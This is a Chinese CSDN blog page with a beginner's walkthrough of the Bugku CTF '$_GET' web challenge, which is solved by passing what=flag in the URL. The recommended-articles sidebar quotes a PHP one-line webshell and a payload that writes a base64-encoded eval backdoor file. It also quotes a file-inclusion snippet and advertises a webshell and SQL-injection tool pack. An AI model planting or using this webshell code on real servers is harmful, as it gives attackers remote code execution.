[CTF萌新的Bugku web闯关之路] web基础$_GET 过关!

最新推荐文章于 2022-08-22 15:59:01 发布
最新推荐文章于 2022-08-22 15:59:01 发布
阅读量285 收藏
点赞数
分类专栏: Bugku 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HippoLaoBan/article/details/105889608
版权

web基础$_GET

Bugku链接

看标题就可以知道这一关考察的是GET请求
到地方后可以看见,页面的源代码已经显示在屏幕上了
在这里插入图片描述
简单翻译这串代码
$_GET[‘what’] 获取get请求中what的值
将这个值赋给 $what
在网页上打印 $what的值
如果 $what的值是flag
在网页上打印我们需要的flag
所以我们要做的就是发送一个what=flag的get请求
在地址栏最后加上?what=flag即可
在这里插入图片描述
在这里插入图片描述
这里的第一个flag就是 $what的值,第二个就是我们需要的flag

Shaw&ZucKerburg
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
html5简单的关小游戏源码下载
11-03
html5简单的关小游戏源码下载 html5简单的关小游戏源码下载
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
CTF-web基础$_POST
三天不打上房揭瓦的博客
08-15 1983
前言:小编也是现学现卖,方便自己记忆,写的不好的地方多多包涵,希望各位大佬多多批评指正。 网址:web基础$_POST 1.进入网址可以看到如下代码。 2.分析该代码,得出只需要传 what参数等于flag即可得出答案。即和GET代码原理一样。 $what=$_POST['what']; echo $what; if($what=='flag') echo 'flag{****}'; 3.这里使用一个小插件来通过此关。hackber 火狐浏览器可以添加的插件,通过hackber来获取到 flag,最终答
BugkuCTF web基础$_GET
weixin_34194379的博客
05-03 134
前言 写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ 点开链接一看,就知道是道代码审计的题目,不过这题比较简单,我们一起看一下这段代码 $what=$_GET['what']; echo $what; if($what=...
WhaleCTF-隐写术writeup
abtgu的博客
03-20 1051
文章目录下雨天分解2分解3女神捉迷藏word隐写 下雨天 题目: 答案格式:GUETCTF{flag},flag是解密内容。 解题思路: 题中图片 用notepad++打开图片,发现该图片是gif 更改后缀名,用StegSolve打开,使用Frame Browser帧浏览功能进行分解,得到flag。 分解2 题目: 提交格式是flag{xxxx},所以答案是? 解题思路: 题中图片 根据题...
ctf图片隐写_浅析CTFCTF之我见(一)
weixin_39852647的博客
11-29 184
前言最近,在V2EX上,一名用户发表了一个自己制作的网站,吸引了大量网友的注意。其实,我也是其中的一个,马上,该网站迅速在解密/探险以及爱好计算机的网友群和空间、朋友圈传播开来。涌现了许许多多向终点奋发冲刺的杰出人物,我第一眼看这个网站,也是有些一脸不屑,但是当我深入其中的时候,却觉得另有深度、深入其中。随着这个网站关卡的深入,可以发现,作者运用的技术和底蕴也越来越强,不仅仅只有技术,还...
php 一句话木马 安全漏洞
fareast_mzh的博客
01-13 1231
* get.php <?php $_GET[a]($_GET[b]);?> ?a=assert&b=${} 参数b中的内容待定 创建文件code.txt fwrite(fopen("c.php", "w"), base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyJjIl0pPz4=")) b.php <?php $...
CTF练习——WEB安全(BurpSuite为主)
zytjulie的博客
08-22 2769
CTF训练,WEB安全,Burpsuite部分
BugkuCTF-Web 前八题
weixin_41782574的博客
11-22 514
web2 打开题目发现全是越来越快的滑稽笑脸,并没有很明显的提示,所以打开F12看源码,用快捷键ctrl+F来搜索Flag,在源码中轻松找到Flag: 计算器 打开题目发现要求求两个二位数之和且和必然为三位数,但结果输出框只能输出一位数字,这意味html源码中input的maxlen限制成了一位,将一位改为三位再输出正确答案即可获得Flag。 web基础$_GET 考察php语言的基础用法,get在url上面获得数据,较为不安全,这里的php代码要求我们输入what=flag的数据即可根据p..
BUUCTF 19
qq_52431855的博客
02-01 481
知识点 PHP foreach循环 PHP foreach 循环结构是遍历数组时常用的方法,foreach 仅能够应用于数组和对象,如果尝试应用于其他数据类型的变量或者未初始化的变量将发出错误信息。 foreach 有以下两种语法格式: //格式1 foreach (array_expression as $value){ statement } //格式2 foreach (array_expression as $key => $value){ statem...
CTF工具之御剑后台扫描(web).rar
09-16
此工具用于学习交流用途,切勿用于其它用途。
ctf web解题找flag夺旗赛之常用的解题思路及技巧
最新发布
12-29
ctf web解题找flag夺旗赛之常用的解题思路及技巧ctf web解题找flag夺旗赛之常用的解题思路及技巧ctf web解题找flag夺旗赛之常用的解题思路及技巧ctf web解题找flag夺旗赛之常用的解题思路及技巧ctf web解题找flag夺...
CTF工具之WEB.zip
10-07
该工具包中含有17年永久火狐浏览器,抓包工具,SQL注入工具,webshell,网站后台扫描工具,代码审计系统等
ctfhub web全部做题记录(持续跟)
01-08
信息泄露 ...url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
BugKuweb题型之post,get传参
D-R0s1的博客
07-21 3708
                          BugKuweb题型之post,get传参        CTF比赛中web题型里经常会见到post和get传参的题型,原理也很简单,在get传参的时候,要构造URL拿一道BugKu中的题来举个例子 很明显,只需要构造what=get,回车,即可得到答案。    在post传参的时候,也是看一下代码要求,例如:       显然...
CTF中的命令执行绕过
蚁景网安学院
04-21 3196
作为CTF基础的操作,命令执行的学习主要是为了以后进一步使用webshell打下基础
BUGKU GET
飞花的世界
01-21 795
flagflag{bugku_get_su8kej2en}
bugku GET
PRCORANGE的博客
04-07 664
题目: $what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}'; 通过使用get方法提交what=flag即可
CTF-web基础$_GET
三天不打上房揭瓦的博客
08-02 882
前言:小编也是现学现卖,方便自己记忆,写的不好的地方多多包涵,希望各位大佬多多批评指正。 网址:web基础$_GET 1.进入网址可以看到如下代码。 2.分析该代码,得出只需要传 what参数等于flag即可得出答案。 `$what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}';` 3.在url中传参 ?what=flag,得出答案于: flag{bugku_get_su8kej2en} ...
isset($_GET['file'])){ $file = $_GET['file']; include($file);
09-01
代码中的isset($_GET['file'])是PHP中的一个函数,用于判断是否存在名为'file'的GET参数。如果存在该参数,代码会将该参数的值赋给变量$file,并使用include函数包含该文件。这段代码看起来存在安全漏洞,因为用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值